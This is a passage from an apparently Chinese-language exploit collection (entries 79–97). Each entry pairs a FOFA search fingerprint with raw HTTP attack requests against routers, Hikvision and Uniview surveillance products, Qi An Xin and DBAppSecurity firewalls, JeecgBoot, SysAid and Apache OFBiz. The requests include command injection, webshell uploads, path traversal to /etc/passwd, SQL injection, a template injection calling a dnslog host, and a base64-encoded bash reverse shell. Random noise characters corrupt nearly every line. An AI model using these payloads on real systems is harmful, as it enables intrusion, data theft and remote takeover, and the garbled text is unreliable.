$ \) P3 \# `- w8 F9 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 I; _' f' P3 S! d$ Z. [Connection: close
2 l, g8 ]4 N3 ?0 M( d8 a; MContent-Length: 336
( s3 s8 d1 g5 r9 QAccept-Encoding: gzip1 {1 U. F5 O2 z; I
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
" X" R* h% k% ?8 _1 w* A" k+ R5 o8 z9 Q; |; C6 Z7 ]! @- E
------YsOxWxSvj1KyZow1PTsh98fdu6l0 n5 Q2 L: z  R3 D6 M
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
- ^1 S2 V& K. V" q, P& IContent-Type: image/png
9 b& C1 r9 K6 {  j+ c# T7 I% H* L- r  k4 |; O6 o6 B
YsOxWxSvj1KyZow1PTsh98fdu6l  n1 t; u  I  ~* j; k# a! r; M
------YsOxWxSvj1KyZow1PTsh98fdu6l
  h# X5 D' T9 _5 q- }, l3 s( A1 ^Content-Disposition: form-data; name="target"
0 w- S( @: @) ]" U+ C
% x: |+ t1 k& o. g: p1 Y, u8 G/Applications/SkillDevelopAndEHS/! i$ n- Z  ^& ]  U
------YsOxWxSvj1KyZow1PTsh98fdu6l--' F' t$ F8 D0 {4 d+ M" R- c& h
- X7 @% ~8 T* f6 Z7 |6 Q
" {. W5 u) |' Q9 A! O/ q! j
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
" x8 S# z% q; [2 g* KHost: x.x.x.x, R$ T. m3 Z6 j

6 @6 _; L- p' r
- I7 b' h3 q- j( A/ Y/ U79. BYTEVALUE 百为流控路由器远程命令执行: T' L6 j$ h5 F" _- U! @
FOFA:BYTEVALUE 智能流控路由器( }% w) r& z8 b+ |& X' @
GET /goform/webRead/open/?path=|id HTTP/1.1
" a4 \3 K( [0 z$ l: g+ U9 N7 cHost:IP  K" j% H8 K9 Q4 U0 c5 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  f4 N2 E4 ], U( c0 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ D7 y8 ]1 S" N1 ?: Y, F/ @5 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# P  I6 Y+ m1 h* z
Accept-Encoding: gzip, deflate& N: ]! _0 w* }. J) u* H, A
Connection: close
# f8 a8 C  I& ~' ]$ t$ fUpgrade-Insecure-Requests: 1
1 U! F( j' i: T$ L& b- a. f. `, Y. P4 h* p' A- \7 c, Q% R
, \% D* d1 |! o
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- b2 j! n) _1 j. ?6 JFOFA:app="速达软件-公司产品"# ^$ m' U- K2 E( _* h% r) M0 n
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1$ v- ^) E- o" \* @+ B5 ~
Host: x.x.x.x
& _' {: n- h5 S5 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' E9 D3 _$ N8 j0 D& O
Content-Length: 27
9 y; R7 }5 j* E) q4 @# lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* `" N3 B" t; ]1 p9 n
Accept-Encoding: gzip, deflate
% g, V6 s% n, {4 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" B# p3 H' u( h
Connection: close
! ~. ]+ A! H) ]5 zContent-Type: application/octet-stream
! q9 z# b' {# M) N( L6 A0 YUpgrade-Insecure-Requests: 11 x9 k3 _# d! j+ v7 B+ \

) [+ u1 c) n9 E<% out.print("oessqeonylzaf");%>
( n: v( h8 P7 _" J8 l4 B
4 E/ S/ q/ e* g' B0 T: F! i3 P- Z# U$ |) l( L* p4 G
GET /xykqmfxpoas.jsp HTTP/1.1
1 a) u, H+ Z& Q" r- CHost: x.x.x.x
0 {# {4 @1 D; [9 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 v9 D* x# a8 }  w
Connection: close
: z% }  P2 h8 q1 QAccept-Encoding: gzip
, V- S" I! y  j9 Y% U
% I: c' I( R1 Q# Q4 Y; F0 e7 s4 B" i9 C- L( u" w: k
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露7 ^# W9 G' {2 l
FOFA:app="uniview-视频监控"
( W2 B4 y0 b+ r/ W5 Y6 _/ {GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1* D) g1 S2 m" x3 A
Host: x.x.x.x
7 _7 s! t, o2 `+ f; eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ N3 r6 K7 b+ I8 Z# X' X; y
Connection: close
2 U) D  y0 r8 v% N% IAccept-Encoding: gzip
7 O5 d( h0 B: `: E$ A. c7 @, M5 i6 _$ s. q/ C
5 v0 {/ O: t9 z  q
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行4 \, W5 q+ l+ L( w0 |
FOFA:app="思福迪-LOGBASE"
0 k* x( s3 k2 Y0 LPOST /bhost/test_qrcode_b HTTP/1.1: J7 g0 M) d/ g4 g
Host: BaseURL
! a: X- t7 W7 m! k  C- JUser-Agent: Go-http-client/1.1
& a3 o1 g; H& {8 ~Content-Length: 23; K7 B8 L7 _8 s( B
Accept-Encoding: gzip
8 o- j& Z, i6 B+ L4 h% ^Connection: close6 {7 p& |1 B3 S% d9 N2 Y
Content-Type: application/x-www-form-urlencoded
! m; I6 d$ z' u4 V" Y* HReferer: BaseURL/ E, |% r: h5 m' t. k

6 H( w/ o# {, H! v) dz1=1&z2="|id;"&z3=bhost; q5 r' A; l# Q1 T: \: Y1 N1 O

$ B0 r3 g) u# V* g2 D1 F, {7 `; |# x  V* _0 o
83. JeecgBoot testConnection 远程命令执行% F2 t3 J8 L$ ]/ W9 T& g; {! v: ^
FOFA:title=="JeecgBoot 企业级低代码平台"
  V  k1 f9 v/ _" O/ E" T" b! J) ?7 A1 U5 }

$ {3 l. X8 Y5 V* y% I+ U+ bPOST /jmreport/testConnection HTTP/1.18 o* S. q( ~7 I  }
Host: x.x.x.x  [  D2 }2 q  x# n; l) m% u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! r) ^* k. W; h& I  rConnection: close
* L# k7 n% }) Q: n. |# bContent-Length: 8881; U0 G, V* V, a1 m/ a1 K6 j
Accept-Encoding: gzip- J* J: h" Y0 g
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"5 |1 L6 l3 P# W% `$ ^* h1 M
Content-Type: application/json
, L, E, N8 ^: o5 C4 X) m+ X6 h3 s& o3 l5 E
PAYLOAD
- `1 G  b, @  i  t7 T
6 E8 T0 |/ V2 `. m/ A0 J84. Jeecg-Boot JimuReport queryFieldBySql 模板注入/ o; G  S  Q0 f% r
FOFA:title=="JeecgBoot 企业级低代码平台"
) M7 N+ @' r% g$ L/ d
' j# i5 x$ N1 w$ h7 n  W1 r0 l1 e) J+ D3 D' i( _
  E) h7 q! {; E, K% p- \- U; E
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
$ m6 T& H8 L6 a* T8 q3 \Host: 192.168.40.130:80809 Y  T7 O5 a! W/ |+ y* w
User-Agent: curl/7.88.1
; F' h' c* Z/ q/ i: t- s+ ]Content-Length: 156
6 W! E7 z4 l1 n! h9 F7 IAccept: */*0 R- @0 L5 o: y2 C! l/ Z, f+ S3 O
Connection: close! w7 I2 ~1 `6 d" x3 c
Content-Type: application/json
# S6 x2 x7 G2 u# nAccept-Encoding: gzip9 @8 B% M3 j5 I% w% C6 D  L# K
8 C5 H. b4 Q' h
{' Z  q6 J. p- f3 B4 b, F$ i1 B
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
& T1 l) q3 i7 W! s# x- m: k  "type": "0"9 p8 s: Z9 y; Z
}8 t  ^, V1 {! Q( Y5 d6 W! i
5 e- _- T% u6 ?/ c+ {7 _$ S
3 f2 y) m6 e  I& T+ U
85. SysAid On-premise< 23.3.36远程代码执行
8 |  v. x0 U: t3 {, ACVE-2023-47246: F) M/ w' e2 J0 w0 J* [$ w
FOFA:body="sysaid-logo-dark-green.png"
7 |( W& V$ j8 Z( E' T/ m% xEXP数据包如下,注入哥斯拉马
4 O* u3 m+ D# c+ b/ }9 W' V* z: ZPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.17 P6 T  w0 D& T" m! ]
Host: x.x.x.x% |* N+ x( H6 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 _! d1 p/ @, v0 v+ j: P- F  F7 nContent-Type: application/octet-stream7 d! y5 M- b# M8 f3 _$ m
Accept-Encoding: gzip* @* L$ `& Y2 Z: O; M
" V! p" t" w5 z8 C8 E) D. A
PAYLOAD! B; Z+ r: O% A' m( g

3 Q5 u9 }" J; D5 Y: @3 `2 n回显URL:http://x.x.x.x/userfiles/index.jsp- u# X. \3 {4 R

, u4 U: v7 V7 \2 q$ y1 w86. 日本tosei自助洗衣机RCE; f% g% w: ]1 M4 T
FOFA:body="tosei_login_check.php"
' [2 j2 |0 A. ?8 v6 E, Z8 sPOST /cgi-bin/network_test.php HTTP/1.1
9 ^- s$ V# r8 O% QHost: x.x.x.x
5 E. ?3 q, t+ b* }! B; Y( c* eUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
7 f/ Y( {+ X2 {# u; KConnection: close
/ G/ ^5 ]) v; u0 i5 y* BContent-Length: 44* g' x# |9 q2 Q1 v  I' Q
Accept: */*7 R/ v$ I/ c# B! h; k4 ?: g- T
Accept-Encoding: gzip
" {9 O% ]# i& H$ H" q. gAccept-Language: en9 `% M( a" X3 p- ]- e
Content-Type: application/x-www-form-urlencoded
& j1 m% R, s8 w; W% e
$ F9 ~* E- d2 B; q7 ^host=%0acat${IFS}/etc/passwd%0a&command=ping# R& j# \4 H$ x( x$ t! o/ a8 c$ x
/ T" h! m) {' c

7 B4 l: a- ^) C% |87. 安恒明御安全网关aaa_local_web_preview文件上传
5 E# W+ S9 X- x# l3 GFOFA:title="明御安全网关"
; ~( G' i5 a3 n- i. c" X7 W6 PPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
2 n) w6 h1 C" }) J; S: ]. [Host: X.X.X.X
6 l& a1 ]! u) b5 v1 z" |6 F* nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. V  j+ S2 I" L8 K4 M$ F. x) g) V0 cConnection: close
( s3 n  L* I* T! E, zContent-Length: 198
8 R# ?" p* f' _' ?8 HAccept-Encoding: gzip
( o: h% K2 P# r% l% cContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd, O' q8 F. \) {- ?5 F; d( W" W0 r1 X

% m' N. L3 e: M, F0 X$ {" S& x--qqobiandqgawlxodfiisporjwravxtvd
3 U6 b  |5 k* r) \Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
- s' G" |* s0 n7 b$ F; i2 S6 PContent-Type: text/plain! x# ?, ]1 |' e

4 ^2 y+ X' u. E2ZqGNnsjzzU2GBBPyd8AIA7QlDq$ ]6 \2 S6 k  P3 s* V  V1 x
--qqobiandqgawlxodfiisporjwravxtvd--
, V5 J- J5 O8 m) V9 @: u' J
/ p! r; c5 C: a3 n6 D$ M+ I' h3 N
! S6 M0 v' E% `) Q/jfhatuwe.php
4 }, a0 V! g3 h$ j9 t& J+ k2 [( x" s! _& D' D
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
$ j: X/ e1 o( J" G7 dFOFA:title="明御安全网关"
, H5 {% C/ q9 N! T& q1 f0 tGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
9 ~4 i' e3 l) oHost: x.x.x.xx.x.x.x, R# A& p/ ?% g2 p1 \! C* C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( o+ n7 L" a6 Q; r8 V* q. PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' S8 y( ^$ P' z; x+ V1 vAccept-Encoding: gzip, deflate3 O" N2 i' g! J, w8 I& ?$ l  R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* x& y5 M  z! H3 Z0 V* ^Connection: close
3 H9 A9 U- l* p6 p1 R
0 `8 n4 V. R5 o# l; h3 S, k5 s9 `1 ]6 U; B
/astdfkhl.php' e+ {' s$ E% p6 p" ?

( }2 Z$ l2 F; q; w; q3 ]89. 致远互联FE协作办公平台editflow_manager存在sql注入
; n& I& L3 a% M0 |0 MFOFA:title="FE协作办公平台" || body="li_plugins_download"
4 v: x$ M  W0 H# k7 ^! wPOST /sysform/003/editflow_manager.js%70 HTTP/1.1, x- c  @3 V" m
Host: x.x.x.x9 ^" \9 |' i  d8 V) a: T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ e* V5 M* s; B6 T. w1 a& c/ S. i- FConnection: close
3 L/ {: F; _7 A3 S5 lContent-Length: 41
  v( y" j4 D& e# `% n# ~4 k6 }Content-Type: application/x-www-form-urlencoded0 P6 P. o2 F, p7 S0 N
Accept-Encoding: gzip
8 ~  h. ?/ D; m- }) l
/ j* o$ `4 K7 P2 Xoption=2&GUID=-1'+union+select+111*222--++ W9 d0 q0 H) z+ ~
  h. i9 X" r5 z
: P, m( a# }0 n' o$ [
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% @4 p2 X! i& a
FOFA:icon_hash="-1830859634"
7 R* K& v9 ^' Z9 D8 G) o/ k" yPOST /php/ping.php HTTP/1.1
' t5 E, b2 N% p  }% pHost: x.x.x.x3 X9 g: Y4 ~1 y9 P5 o5 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/ c' D! D" o. K9 A
Content-Length: 51. l8 x2 N* z" _4 f3 n
Accept: application/json, text/javascript, */*; q=0.01
! j2 I; c/ L) OAccept-Encoding: gzip, deflate
4 v+ v% v, Z6 v( eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 M2 Y) O. b+ GConnection: close
( V; V9 U7 \9 R) s/ RContent-Type: application/x-www-form-urlencoded- j* n0 v9 O4 h3 m% y
X-Requested-With: XMLHttpRequest
! h1 o. Q' P% @+ {/ }, g0 B
8 t7 @+ t; Z. vjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
9 z* ~( M& `( u3 M+ w. g+ @
0 v# W3 a! @  W+ ?% _- I, U( z) G& ?$ _* `1 ]3 b6 Q/ d/ s( p
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取/ i5 h1 i' H2 P
FOFA:title="综合安防管理平台"
7 Z. o1 b. d6 K, |GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" T, a- {+ c2 M; ~
Host: your-ip" V: R5 g" G6 ]1 Z" F7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36) |+ [/ b! n5 C
Accept-Encoding: gzip, deflate
- S" A! h# u& l) @Accept: */*
2 ], w' u/ L. N) AConnection: keep-alive. F- Z  Q$ ~/ U$ L; n6 w' F
) ?3 N4 [1 `# ?" J2 ~

  {4 M6 k4 ~; C& H2 u5 }2 `, \
; [3 S; a, V" Q8 H92. 海康威视运行管理中心session命令执行
$ n7 A% L$ b, U) R( {( f4 f0 nFastjson命令执行
+ U& u0 p- I( Y7 I8 P3 Q8 c8 Uhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
! t# O8 L- c, \( N% E& fPOST /center/api/session HTTP/1.17 _1 E- u1 A* Y5 p/ |1 x
Host:+ C( W) z  u1 @; u0 I8 b: C( g
Accept: application/json, text/plain, */*
8 Q6 N$ M. z) o0 m$ R# SAccept-Encoding: gzip, deflate# J  T! f1 S% e& r5 }
X-Requested-With: XMLHttpRequest* o: J. O0 o/ F
Content-Type: application/json;charset=UTF-8
9 Q3 k5 H( q. C- J5 w0 O) hX-Language-Type: zh_CN7 K  F) }) r' L. _
Testcmd: echo test: c2 Y, l* ]* f1 Q# q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
8 P  A9 k9 \; V1 wAccept-Language: zh-CN,zh;q=0.9) M4 K, l4 L4 S: {2 n; T% C: F2 s; }! j
Content-Length: 5778
" x% J% ?3 b1 I* E; H* B* a( H) E4 z- h1 o  V( g
PAYLOAD
& s! V  S2 b: L$ X7 O# p) h, ]6 x4 o# o/ g6 {) i
2 L6 U( Y: }+ k9 u; U3 W" Q7 m! f
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传, x' E  L& P* A4 P- i6 }# e
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
' M( P, s6 c8 \3 Q; h  ~* C: CPOST /?g=app_av_import_save HTTP/1.1: L6 S% L4 ?0 ^' d. e4 F
Host: x.x.x.x
7 |8 g6 M; v7 F4 ]+ M3 lContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
- }6 p5 X. A, e2 R) w2 t, |User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; h( x& {! w- N; E% d6 ]: |) V
8 B8 |1 @3 X- u: F. `, A------WebKitFormBoundarykcbkgdfx0 ~( r5 s, t; f1 }
Content-Disposition: form-data; name="MAX_FILE_SIZE"
- {/ s% F) _! d' `0 n; J8 W" y; N4 W7 q3 P! x3 y8 _
10000000
- j* N/ ?. f9 m& A1 k------WebKitFormBoundarykcbkgdfx
1 K3 B' _9 q; m8 g3 E2 _' {" U3 ZContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"' l! I* T9 x7 {; P. ^! P# C# y# i+ ~
Content-Type: text/plain$ `: e9 J; ~7 H- o8 i5 u

6 ~# w9 e; Z3 j/ q# A/ D; f' `& Lwagletqrkwrddkthtulxsqrphulnknxa' Y! a4 H- [; k1 @
------WebKitFormBoundarykcbkgdfx$ K/ G9 m7 C" C  W/ {
Content-Disposition: form-data; name="submit_post"
" f) f1 J" [7 {, e$ g6 h4 y: `+ `9 C( l0 j
obj_app_upfile
3 G% t, a( r" |8 d, ?7 H------WebKitFormBoundarykcbkgdfx* c9 O0 s. P- `
Content-Disposition: form-data; name="__hash__"0 `" u3 q% W  `# c, e# }. k6 W
% O! k, h( o- j; m: {
0b9d6b1ab7479ab69d9f71b05e0e9445
- _) K2 X' @6 f: }) Z# W------WebKitFormBoundarykcbkgdfx--
# |4 A6 Q/ R' h  O, w% t0 S' X; {
% d- A5 K/ h. [0 a( k- D' c( V! a' y) R) w; h4 a/ w
GET /attachements/xlskxknxa.txt HTTP/1.1# U* o% k6 N( L# |  {9 m
Host: xx.xx.xx.xx7 K8 s+ J( y: x6 [8 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 T2 Z) D( }8 L" F8 ~0 N, W. j( x* c4 `
+ L9 u$ N/ t/ a9 @
3 h- u: h8 _! K& Y' ]5 b. P, H94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传0 y% @! D- P0 ]1 a* k9 B1 s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% v9 d1 Y. c/ T3 A
POST /?g=obj_area_import_save HTTP/1.1
: @1 ]0 f( q! X1 i( kHost: x.x.x.x- R: S% s1 }! d7 Y$ X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt8 O! E8 X7 U0 R5 R6 ]$ Z- }/ C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ F; D/ U0 V* t* R- ~
. I2 L- N, A. Z; W
------WebKitFormBoundarybqvzqvmt# i. N0 q6 `' s& v' ~: M5 w
Content-Disposition: form-data; name="MAX_FILE_SIZE"
' j9 M* k5 N9 u3 [
3 l5 d6 M# S% K10000000
0 O) O1 q" A2 P/ O: J) g( S------WebKitFormBoundarybqvzqvmt$ o6 @1 ~/ ^9 l5 U. N0 X
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
$ Q! d1 ^5 n* c. _, B2 |, A+ oContent-Type: text/plain* n# r, P- E, O  b
3 m$ }& |# ]/ _2 J
pxplitttsrjnyoafavcajwkvhxindhmu
4 q' d# V4 q% T7 O------WebKitFormBoundarybqvzqvmt& M* u) p. Z/ N# g) A# R8 W  Y* `
Content-Disposition: form-data; name="submit_post"( f8 ~. _: }0 G5 `+ o) N

$ s; R( z; v2 {! j3 {+ F7 Z' uobj_app_upfile" R/ c- c. |) m: |# x2 U% y
------WebKitFormBoundarybqvzqvmt
( E: x; i, K: kContent-Disposition: form-data; name="__hash__"
7 C) l' \* g, n+ k3 f8 [% q6 Q* u2 G3 Z6 G) }" n8 a
0b9d6b1ab7479ab69d9f71b05e0e9445
, w2 z- o4 F: |* l7 ?7 d------WebKitFormBoundarybqvzqvmt--
( t' V, z/ c- w* \3 y' {& T. h
) K! U) w4 [; U0 M4 K9 ^1 Z/ v% \2 l' \. i2 ]$ R2 D" Z! u
/ x- Q8 g+ X+ ?+ S; t8 A
GET /attachements/xlskxknxa.txt HTTP/1.1
! ?2 _1 G) Z' x" V* j1 E" uHost: xx.xx.xx.xx  J2 d& }% `: n9 [) h1 O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 v- `+ r2 T/ [/ h

- E4 S7 v: W! F. @3 s# g5 g4 a7 H/ t# }- i/ a2 U( W' B- v

2 v/ h7 k: M; h2 |95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行& ?. W! m8 g9 ~) v
CVE-2023-49070! @. O, @4 e% C$ ~0 H0 _, f
FOFA:app="Apache_OFBiz"
" U. {& F5 p" w+ h2 z2 [POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
5 s0 F1 P; X. iHost: x.x.x.x
( X- H. s& E! a- B3 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ [2 b8 I) D! ?8 X
Connection: close
4 Z% V/ c# ]5 n9 H. a3 E- gContent-Length: 889+ P! C1 M9 Y$ R6 h
Content-Type: application/xml
( s! S7 k4 U5 ^# I* w- q$ hAccept-Encoding: gzip% b! `+ x/ `7 J9 V3 W
8 n5 a# Z) C" q' [' X" e( a
<?xml version="1.0"?>8 \3 f! F2 d  y7 l6 e  U
<methodCall>
, h- }* \! L! d6 g: Y0 k   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>* f( ]& [. L( i: r3 H
    <params>
0 t2 \# M, h8 R) N# T$ v- w' B      <param>
+ m0 ~7 W: Y& j5 a% R      <value>
: e) v+ M' P8 o0 [& T        <struct>
( t6 t9 E5 |+ b       <member>
6 E% y& M/ x9 t  e4 |4 c6 j5 w( }          <name>test</name>
- g" J2 h7 E, n0 G* Z1 l! s9 b2 `          <value>
4 M# _7 F% V) {+ L% Q      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>1 f9 ?' U& i" g
          </value>- Y( y8 x+ d3 \2 D$ C8 ?
        </member>& |9 B' t& [5 z) o0 j! N. o
      </struct>& o% u. W7 T, r! Z
      </value>  Q$ ^5 I  J2 c9 \* B7 y
    </param>/ H  r! o1 V- e: v
    </params>3 @+ \" f+ M: ~
</methodCall>! U2 M- a4 q3 W4 O
: Q& Z. W. g- k' A. |

4 x( E& p1 q# R% ]用ysoserial生成payload
) j' b7 G: Z# i* m; |( [5 Cjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
+ J( A( G) e7 B  c, _
) C4 ]6 R; b5 N0 {
) }0 o8 ~& w: |; ^) s1 _将生成的payload替换到上面的POC7 u. c, {1 L8 ~: j4 M
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! t( b' c  \# G% K+ c6 D) p- b
Host: 192.168.40.130:8443! E# M" @, m( l) Z) Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.360 F  k" K7 ~5 n
Connection: close+ ~, h8 Y9 [: K$ z6 V
Content-Length: 889
/ X9 F8 g& S3 a- I3 |% {7 C1 Z6 EContent-Type: application/xml% C0 @6 w7 T/ c9 B
Accept-Encoding: gzip
6 t+ B0 D+ e' Z. A1 C! [, a3 j4 I- j# H' B& k
PAYLOAD. R  h5 x! u8 ~( V/ c* ~
9 Q! R$ H5 }. `/ }. a
96. Apache OFBiz  18.12.11 groovy 远程代码执行
( O* z) e, L9 N6 c% |FOFA:app="Apache_OFBiz"
, C  Q9 d) c" ~" P  ]" r3 w9 XPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.17 m' s, D9 m. x% D5 ^# Q% _. d! `8 f
Host: localhost:8443
$ j, x' V9 l, W  Z- ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: T' F/ j9 ]& g9 A) C/ z; i
Accept: */*
1 |# q8 a- a7 D, s  NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: T% H3 X6 n% x% o# D  @Content-Type: application/x-www-form-urlencoded+ n* t- Y* W" r" _* R
Content-Length: 55
1 m0 C* v5 X- j% m& [7 S! v
1 Z8 n* `! O! M+ I8 p! k7 AgroovyProgram=throw+new+Exception('id'.execute().text);5 v4 \1 K. a4 k* E% z+ L: p+ d( s" n

" a# ~0 V9 u, g0 L  j
8 s3 c# j7 @7 c- ^反弹shell
8 _2 \7 O6 V$ p+ F$ c/ {+ A; O* u  r6 z在kali上启动一个监听& m" z6 O3 O- |, g$ m
nc -lvp 7777# L" L7 f# k/ Q3 C. Y" H5 V
  Q. h& |# S2 q% X
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% a( s1 G/ R6 c( @2 O. n
Host: 192.168.40.130:8443) n1 `7 I( G% H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 P$ O' U( v" [% ^, m6 {7 V; pAccept: */*
1 s4 Y( i! W2 W' Z/ e6 G8 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) y" e. b2 N" W2 gContent-Type: application/x-www-form-urlencoded! J3 X0 g+ c, V$ N- i
Content-Length: 71" t! j) ^: _3 E0 p" o2 j0 w

7 K! j% x& E+ A  ~2 n5 igroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
$ A: k3 c" Y5 S5 R
7 ?, h6 |& c9 }+ T: Z0 {97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行$ y/ V7 N' B' `8 l' J
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
9 v7 d# `, i, qGET /passport/login/ HTTP/1.1
. ^+ T4 V. L' F" p0 w" i* S  GHost: 192.168.40.130:8085! t7 T8 g( d& a$ l; ~5 V
